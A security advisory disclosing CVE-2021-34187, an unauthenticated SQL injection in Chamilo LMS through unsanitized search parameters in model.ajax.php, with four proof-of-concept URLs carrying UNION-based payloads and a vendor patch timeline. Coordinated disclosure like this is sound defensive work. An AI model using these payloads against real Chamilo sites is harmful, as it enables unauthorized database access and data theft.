Product: Chamilo LMS 1.11.x, 2.x
Vulnerability: SQL injection
Author: Kutlymurat Mambetniyazov (@manfromkz)
Acknowledgements: NitroTeam.kz
Date: 05/25/2021
Description: Lack of sanitization of GET-parameters searchField, filters, filters2 in /main/inc/ajax/model.ajax.php leads to the multiple unauthorized SQL injections
Tested on: Windows 10 x64, Apache 2.4, 10.3.22-MariaDB, PHP 7.4, Chamilo LMS 1.11.x and 2.x.
PoC:
Version 1.11.x, parameter – searchField
http://chamilo1.11.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
Version 2.x, parameter – searchField
http://chamilo2.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
Parameters: filters, filters2
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters2={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
Timeline of the vulnerability:
05/25/2021 – vulnerability discover
05/27/2021 – notification to vendor
05/28/2021 – confirmation by vendor and patch release (version 1.11.x – https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571 and version 2.x – https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59)
06/01/2021 – published on vendors issue tracker (https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection)
06/20/2021 – published
06/28/2021 – CVE-2021-34187 was assigned by MITRE